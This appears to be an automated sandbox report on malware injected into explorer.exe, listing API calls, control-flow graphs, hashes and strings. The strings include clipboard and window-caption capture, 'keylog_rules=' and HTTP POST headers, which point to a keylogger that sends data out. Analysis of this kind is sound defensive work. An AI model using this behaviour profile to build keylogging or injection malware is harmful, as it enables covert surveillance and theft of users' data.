                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                                                                                                                                                                                                                              • String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
                                                                                                                                                                                                                              • API String ID: 2651329914-3371406555
                                                                                                                                                                                                                              • Opcode ID: 8f5638f6ac77f61a2416489b80d2785820cde2a299127bf9f5e28ba194ce444c
                                                                                                                                                                                                                              • Instruction ID: 5138c5b8ce8c1c05da6c3d9b4deb79653be1aebd46c7dfffdef6748e41067168
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f5638f6ac77f61a2416489b80d2785820cde2a299127bf9f5e28ba194ce444c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F214F30980334EBEB622B2DFC88F2B3B59EB41A957544864FC0592305DAE5DC25CAB5

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 02D52603
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02D5260B
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02D5261B
                                                                                                                                                                                                                              • Thread32First.KERNEL32(00000000,0000001C), ref: 02D52629
                                                                                                                                                                                                                              • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 02D52648
                                                                                                                                                                                                                              • SuspendThread.KERNEL32(00000000), ref: 02D52658
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02D52667
                                                                                                                                                                                                                              • Thread32Next.KERNEL32(00000000,0000001C), ref: 02D52677
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02D52682
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1467098526-0
                                                                                                                                                                                                                              • Opcode ID: e79530dca19ba69afa4420387c490db8f6d572a2b5560d86d59fee8acd12f5f4
                                                                                                                                                                                                                              • Instruction ID: b23e65e63c1651fcc7004d3ba7bab3e678bf73f477849f40cf199f52e468fcb1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e79530dca19ba69afa4420387c490db8f6d572a2b5560d86d59fee8acd12f5f4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB117032C44360EFDB419F64A84CA6FBBE4EF44791F140899FD4692340D7B08D29CBA2

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 295 2d520a1-2d520fc call 2d5240f call 2d52a09 call 2d5298a call 2d524cc 304 2d52117-2d52123 295->304 305 2d520fe-2d52115 295->305 308 2d52127-2d52129 304->308 305->308 309 2d523fd-2d5240c call 2d529eb 308->309 310 2d5212f-2d52166 RtlZeroMemory 308->310 314 2d523f5-2d523fc 310->314 315 2d5216c-2d52187 310->315 314->309 316 2d521b9-2d521cb 315->316 317 2d52189-2d5219a call 2d5243d 315->317 322 2d521cf-2d521d1 316->322 323 2d521ad 317->323 324 2d5219c-2d521ab 317->324 326 2d521d7-2d52233 call 2d5288d 322->326 327 2d523e2-2d523e8 322->327 325 2d521af-2d521b7 323->325 324->325 325->322 335 2d52239-2d5223e 326->335 336 2d523db 326->336 329 2d523f1 327->329 330 2d523ea-2d523ec call 2d529eb 327->330 329->314 330->329 337 2d52240-2d52251 335->337 338 2d52258-2d52286 call 2d52a09 wsprintfW 335->338 336->327 337->338 341 2d5229f-2d522b6 338->341 342 2d52288-2d5228a 338->342 348 2d522f5-2d5230f 341->348 349 2d522b8-2d522ee call 2d52a09 wsprintfW 341->349 343 2d5228b-2d5228e 342->343 344 2d52290-2d52295 343->344 345 2d52299-2d5229b 343->345 344->343 347 2d52297 344->347 345->341 347->341 353 2d52315-2d52328 348->353 354 2d523b8-2d523ce call 2d529eb 348->354 349->348 353->354 357 2d5232e-2d52344 call 2d52a09 353->357 362 2d523d7 354->362 363 2d523d0-2d523d2 call 2d529eb 354->363 364 2d52346-2d52351 357->364 362->336 363->362 366 2d52365-2d5237c 364->366 367 2d52353-2d52360 call 2d529ce 364->367 371 2d52380-2d5238d 366->371 372 2d5237e 366->372 367->366 371->364 373 2d5238f-2d52393 371->373 372->371 374 2d52395-2d523a7 call 2d529bd RtlMoveMemory 373->374 375 2d523ad-2d523b4 call 2d529eb 373->375 374->375 375->354
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D52A09: GetProcessHeap.KERNEL32(00000008,0000A000,02D510BF), ref: 02D52A0C
                                                                                                                                                                                                                                • Part of subcall function 02D52A09: RtlAllocateHeap.NTDLL(00000000), ref: 02D52A13
                                                                                                                                                                                                                                • Part of subcall function 02D5298A: lstrlen.KERNEL32(02D54FE2,?,00000000,00000000,02D520DD,74DE8A60,02D54FE2,00000000), ref: 02D52992
                                                                                                                                                                                                                                • Part of subcall function 02D5298A: MultiByteToWideChar.KERNEL32(00000000,00000000,02D54FE2,00000001,00000000,00000000), ref: 02D529A4
                                                                                                                                                                                                                                • Part of subcall function 02D524CC: RtlZeroMemory.NTDLL(?,00000018), ref: 02D524DE
                                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(?,0000003C), ref: 02D52139
                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 02D52272
                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 02D522DD
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02D523A7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                                                                                                                              • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                                                                                                                              • API String ID: 4204651544-1701262698
                                                                                                                                                                                                                              • Opcode ID: ef8aa9c9b4f77252f571bd4e3cb0984d907560a7605af6afd87097fae1db38a7
                                                                                                                                                                                                                              • Instruction ID: 1cd51b633585d9b66b2f06d32ff48559853e67c2ef0155bff054f0a7ee39d216
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ef8aa9c9b4f77252f571bd4e3cb0984d907560a7605af6afd87097fae1db38a7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7A14C71508365AFDB509F689888A2BBBE9EB88744F00082DFD85D7350DBB4DD18CF62

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 380 2d512ae-2d512bf 381 2d512c5-2d512c7 380->381 382 2d513a6-2d513ad 380->382 381->382 383 2d512cd-2d512fc call 2d529bd lstrlen call 2d52a09 381->383 388 2d5136e-2d51377 call 2d529eb 383->388 389 2d512fe-2d51327 call 2d52841 RtlZeroMemory 383->389 394 2d5139d-2d513a5 call 2d529ae 388->394 395 2d51379-2d5137d 388->395 396 2d51353-2d51369 RtlMoveMemory call 2d52569 389->396 397 2d51329-2d5134f RtlMoveMemory call 2d52569 389->397 394->382 398 2d5137f-2d51392 call 2d5255c PathMatchSpecA 395->398 396->388 397->389 406 2d51351 397->406 407 2d51394-2d51397 398->407 408 2d5139b 398->408 406->388 407->398 409 2d51399 407->409 408->394 409->394
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D529BD: VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,02D512D9,00000000,00000000,?,00000001), ref: 02D529C7
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 02D512DC
                                                                                                                                                                                                                                • Part of subcall function 02D52A09: GetProcessHeap.KERNEL32(00000008,0000A000,02D510BF), ref: 02D52A0C
                                                                                                                                                                                                                                • Part of subcall function 02D52A09: RtlAllocateHeap.NTDLL(00000000), ref: 02D52A13
                                                                                                                                                                                                                              • PathMatchSpecA.SHLWAPI(?,00000000), ref: 02D5138A
                                                                                                                                                                                                                                • Part of subcall function 02D52841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,02D51119,00000001), ref: 02D52850
                                                                                                                                                                                                                                • Part of subcall function 02D52841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,02D51119,00000001), ref: 02D52855
                                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(00000000,00000104), ref: 02D51316
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02D51332
                                                                                                                                                                                                                                • Part of subcall function 02D52569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,02D5136E), ref: 02D52591
                                                                                                                                                                                                                                • Part of subcall function 02D52569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 02D5259A
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02D5135F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2993730741-0
                                                                                                                                                                                                                              • Opcode ID: abe6acd89e9010535deeb6b9c4ef37afc3f34ca5bc43cb0879edc2a2a096acec
                                                                                                                                                                                                                              • Instruction ID: b29aee955f2bc22967ac823053ebf18cac654933704977532453592963939fcc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: abe6acd89e9010535deeb6b9c4ef37afc3f34ca5bc43cb0879edc2a2a096acec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83215370B043219F9B04EE689864A7FB7DAEB84754F10092EFC95D3740DBB4DD498A62

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 410 2d51581-2d51592 412 2d51624-2d51628 410->412 413 2d51598-2d5159b 410->413 414 2d515a7-2d515b3 GlobalLock 413->414 415 2d5159d-2d515a0 413->415 417 2d515b5-2d515b9 414->417 418 2d51623 414->418 415->414 416 2d515a2-2d515a5 415->416 416->412 416->414 419 2d515e9 417->419 420 2d515bb-2d515be 417->420 418->412 423 2d515eb-2d515f2 call 2d5293e 419->423 421 2d515e4-2d515e7 420->421 422 2d515c0-2d515c3 420->422 421->423 424 2d515c5-2d515e2 lstrlenW call 2d52a09 lstrcatW 422->424 425 2d515f4-2d515fd call 2d52724 422->425 423->425 424->425 432 2d515ff-2d51608 lstrlenW 425->432 433 2d5161b-2d51622 GlobalUnlock 425->433 432->433 434 2d5160a-2d5160e 432->434 433->418 435 2d5160f call 2d516b9 434->435 436 2d51614-2d51616 call 2d529eb 435->436 436->433
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 02D515A9
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 02D515C6
                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,00000000), ref: 02D515DC
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 02D51600
                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 02D5161C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Globallstrlen$LockUnlocklstrcat
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1114890469-0
                                                                                                                                                                                                                              • Opcode ID: fda4c34073f8f4277f6d94f8583e3fa3c3232c4d92f0a978256fb7bf2011494e
                                                                                                                                                                                                                              • Instruction ID: 7f29b0463f6047ba6366a441dbf4278ed5e15841e15ea5e49631ab18c97ef6ce
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fda4c34073f8f4277f6d94f8583e3fa3c3232c4d92f0a978256fb7bf2011494e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A301A532E402715B9E656A7D689877E63BEDFC5255B084565EC0E92300DFF4CC16C660
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(?,?,?), ref: 02D51BF4
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,02D55848,00000000,00000000,74DF2EE0,00000000,02D519B6,?,?,?,00000001,?,00000000), ref: 02D51C1C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000002), ref: 02D51C49
                                                                                                                                                                                                                              • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 02D51C9A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3827878703-0
                                                                                                                                                                                                                              • Opcode ID: 4feb61105108d7c9b67a696fe965bfc2effbea2a94a06caeb9dcb27907806e22
                                                                                                                                                                                                                              • Instruction ID: 2c283f0c92ce3e3d4cf40468f21a7a802ffec592e978e9bec9ad491afcc4350f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4feb61105108d7c9b67a696fe965bfc2effbea2a94a06caeb9dcb27907806e22
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9317C71600626ABCF188F29C884B76F7A8BF15259F54456CEC9ACB300D7B2EC55DBA0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlEnterCriticalSection.NTDLL(02D5582C), ref: 02D51839
                                                                                                                                                                                                                              • lstrlenW.KERNEL32 ref: 02D51845
                                                                                                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(02D5582C), ref: 02D518A9
                                                                                                                                                                                                                              • Sleep.KERNEL32(00007530), ref: 02D518B4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeaveSleeplstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2134730579-0
                                                                                                                                                                                                                              • Opcode ID: aa041e41527603fcc2dac47f81ced645f8aa4eb5caa974c80c6d398c357041bf
                                                                                                                                                                                                                              • Instruction ID: 11f8ae154a6a720f85450898dedebfa37cbc050b08e772c645758c190b763165
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa041e41527603fcc2dac47f81ced645f8aa4eb5caa974c80c6d398c357041bf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86018F30D90330ABDB666B69EC5CA2E3BAAEF417517600418EC0586380DBF4CD19DFB2
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,02D511DD), ref: 02D526DB
                                                                                                                                                                                                                              • IsWow64Process.KERNEL32(000000FF,?), ref: 02D526ED
                                                                                                                                                                                                                              • IsWow64Process.KERNEL32(00000000,?), ref: 02D52700
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02D52716
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 331459951-0
                                                                                                                                                                                                                              • Opcode ID: 905055d8b412025919e4e84ba7cd6a6b96ac58df66d3bf320f6f982f6fd42ac8
                                                                                                                                                                                                                              • Instruction ID: 9db35ddd7fb3409f85ceb9e554c5c2f9bee36c0bcbd511aaa6062d89eb5d5b7e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 905055d8b412025919e4e84ba7cd6a6b96ac58df66d3bf320f6f982f6fd42ac8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DAF09072C42338FF9F50CFA49D499AEB7BCEE05295B2002AAED0093340D7B08E14D6A0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D52A09: GetProcessHeap.KERNEL32(00000008,0000A000,02D510BF), ref: 02D52A0C
                                                                                                                                                                                                                                • Part of subcall function 02D52A09: RtlAllocateHeap.NTDLL(00000000), ref: 02D52A13
                                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,00000000), ref: 02D517F3
                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 02D5181D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 02D51817
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                                                                                                                                                                              • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                                                                                                                                                                                                                              • API String ID: 377395780-613334611
                                                                                                                                                                                                                              • Opcode ID: 4817677bbf3543e0d55baca29b83a35a879161d5efca44d71f0a3478201de2c1
                                                                                                                                                                                                                              • Instruction ID: a303ddde6c1df4029342fb474915446966f65452476bbd6b6582c3c282ad35ea
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4817677bbf3543e0d55baca29b83a35a879161d5efca44d71f0a3478201de2c1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04F01261900138BA9B545BD99C458BEB3FCEA08742B00058AFE51D1140E5B85D60D3B5

                                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                                                                                              • Disassembly available
                                                                                                                                                                                                                              callgraph 0 Function_00ABB4A8 46 Function_00ABB46A 0->46 1 Function_00AB25A8 30 Function_00AB2580 1->30 49 Function_00AB2768 1->49 81 Function_00AB18D0 1->81 2 Function_00AB1CAC 3 Function_00AB20AC 20 Function_00AB1A88 3->20 4 Function_00AB2E2C 23 Function_00AB188C 4->23 55 Function_00AB1860 4->55 72 Function_00AB2DC0 4->72 5 Function_00AB31AC 5->1 11 Function_00AB1838 5->11 41 Function_00AB1B10 5->41 5->55 63 Function_00AB26F8 5->63 85 Function_00AB1D54 5->85 6 Function_00AB1822 7 Function_00AB27A0 8 Function_00AB1D24 9 Function_00AB24B8 9->11 9->55 67 Function_00AB20F4 9->67 10 Function_00AB1938 10->11 10->55 12 Function_00ABB2BE 12->0 13 Function_00AB19BC 14 Function_00AB2FBC 14->4 15 Function_00AB4233 16 Function_00AB14B2 17 Function_00ABAAB0 18 Function_00AB5289 19 Function_00AB1508 21 Function_00ABAC8D 22 Function_00AB370C 22->5 22->11 22->22 53 Function_00AB1C6C 22->53 73 Function_00AB34C4 22->73 23->11 24 Function_00AB1F0C 25 Function_00AB4203 26 Function_00ABA881 27 Function_00ABAD00 28 Function_00AB1000 29 Function_00AB1F00 31 Function_00ABB007 32 Function_00AB1405 33 Function_00AB1D04 34 Function_00AB2A04 35 Function_00AB2918 34->35 34->53 74 Function_00AB27C4 34->74 36 Function_00AB141D 37 Function_00ABAB9C 38 Function_00AB1E9C 39 Function_00AB1E1C 39->11 40 Function_00ABB291 42 Function_00AB4817 43 Function_00AB3394 43->11 43->20 43->38 50 Function_00AB18E8 43->50 43->55 64 Function_00AB1EF8 43->64 43->81 44 Function_00AB2D14 44->9 44->11 44->39 44->50 44->55 45 Function_00ABADEA 47 Function_00ABC0E9 48 Function_00ABA8E8 49->7 51 Function_00AB3068 51->4 51->10 51->11 51->53 51->55 52 Function_00AB156C 54 Function_00ABAFE3 55->53 56 Function_00AB1560 57 Function_00AB2664 58 Function_00AB1EFA 59 Function_00AB14F9 60 Function_00AB5579 61 Function_00AB1BF8 62 Function_00AB18F8 63->30 63->53 63->57 65 Function_00ABAFF6 66 Function_00AB1576 67->3 67->11 67->13 67->23 67->24 67->55 67->62 79 Function_00AB1FDC 67->79 67->81 68 Function_00ABB148 69 Function_00AB4048 70 Function_00ABABCF 71 Function_00AB1C4C 72->11 73->2 73->8 73->11 73->13 73->20 73->33 73->34 73->43 73->53 73->55 73->61 73->71 75 Function_00ABB15B 76 Function_00ABB358 76->0 77 Function_00AB3158 78 Function_00ABB2DF 79->11 79->62 80 Function_00ABAAD2 82 Function_00ABABD7 83 Function_00AB1254 84 Function_00AB14D4

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 113 ab370c-ab371c call ab1c6c 116 ab3722-ab3754 call ab1838 113->116 117 ab37b0-ab37b5 113->117 121 ab3756-ab375b call ab1838 116->121 122 ab3785-ab37aa NtUnmapViewOfSection 116->122 124 ab3760-ab3779 121->124 126 ab37bc-ab37cb call ab34c4 122->126 127 ab37ac-ab37ae 122->127 124->122 133 ab37cd-ab37d0 call ab370c 126->133 134 ab37d5-ab37de 126->134 127->117 128 ab37b6-ab37bb call ab31ac 127->128 128->126 133->134
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL ref: 00AB378C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001C.00000002.3006402988.0000000000AB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_ab1000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: SectionUnmapView
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 498011366-0
                                                                                                                                                                                                                              • Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                                                                                                                                              • Instruction ID: 8f9b32f447e3888f16aa98ddf7d323815796c84e86ed31d9fc94defaf7a58b4e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C711C8746019094FFF58FBB8989D3B537D9F714312F544029E815C72A3EE3A8A818700

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00AB1BF8: OpenFileMappingA.KERNEL32 ref: 00AB1C0F
                                                                                                                                                                                                                                • Part of subcall function 00AB1BF8: MapViewOfFile.KERNELBASE ref: 00AB1C2E
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00AB35B7
                                                                                                                                                                                                                              • Process32First.KERNEL32 ref: 00AB35DA
                                                                                                                                                                                                                              • CharLowerA.USER32 ref: 00AB35EE
                                                                                                                                                                                                                              • Process32Next.KERNEL32 ref: 00AB36CD
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE ref: 00AB36DE
                                                                                                                                                                                                                              • SysFreeMap.PGOCR ref: 00AB36F7
                                                                                                                                                                                                                              • SleepEx.KERNELBASE ref: 00AB3701
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001C.00000002.3006402988.0000000000AB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_ab1000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileProcess32$CharCloseCreateFirstFreeHandleLowerMappingNextOpenSleepSnapshotToolhelp32View
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2386764625-0
                                                                                                                                                                                                                              • Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                                                                                                                                                              • Instruction ID: 759251131a6eb6421a1057a63610ac4d8b01566b9a0622ff25a9a7c5ddf35251
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7519731218A084FDB19FB68D9A96EB73E9FB94310F844619E457C72A3DF38DA058781

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 54 abb4a8-abb4ab 55 abb4b5-abb4b9 54->55 56 abb4bb-abb4c3 55->56 57 abb4c5 55->57 56->57 58 abb4ad-abb4b3 57->58 59 abb4c7 57->59 58->55 60 abb4ca-abb4d1 59->60 62 abb4dd 60->62 63 abb4d3-abb4db 60->63 62->60 64 abb4df-abb4e2 62->64 63->62 65 abb4f7-abb504 64->65 66 abb4e4-abb4f2 64->66 76 abb51e-abb52c call abb46a 65->76 77 abb506-abb508 65->77 67 abb52e-abb549 66->67 68 abb4f4-abb4f5 66->68 69 abb57a-abb57d 67->69 68->65 71 abb57f-abb580 69->71 72 abb582-abb589 69->72 74 abb561-abb565 71->74 75 abb58f-abb593 72->75 78 abb54b-abb54e 74->78 79 abb567-abb56a 74->79 80 abb5f0-abb5f9 75->80 81 abb595-abb5ae LoadLibraryA 75->81 76->55 82 abb50b-abb512 77->82 78->72 87 abb550 78->87 79->72 83 abb56c-abb570 79->83 84 abb5fc-abb605 80->84 86 abb5af-abb5b6 81->86 102 abb51c 82->102 103 abb514-abb51a 82->103 88 abb572-abb579 83->88 89 abb551-abb555 83->89 90 abb62a-abb67a VirtualProtect * 2 84->90 91 abb607-abb609 84->91 86->75 93 abb5b8 86->93 87->89 88->69 89->74 100 abb557-abb559 89->100 97 abb67e-abb683 90->97 95 abb60b-abb61a 91->95 96 abb61c-abb628 91->96 98 abb5ba-abb5c2 93->98 99 abb5c4-abb5cc 93->99 95->84 96->95 97->97 104 abb685-abb694 97->104 105 abb5ce-abb5da 98->105 99->105 100->74 101 abb55b-abb55f 100->101 101->74 101->79 102->76 102->82 103->102 108 abb5dc-abb5e3 105->108 109 abb5e5-abb5ef 105->109 108->86
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 00ABB5A7
                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00ABB651
                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE ref: 00ABB66F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001C.00000002.3006402988.0000000000ABA000.00000040.80000000.00040000.00000000.sdmp, Offset: 00ABA000, based on PE: false
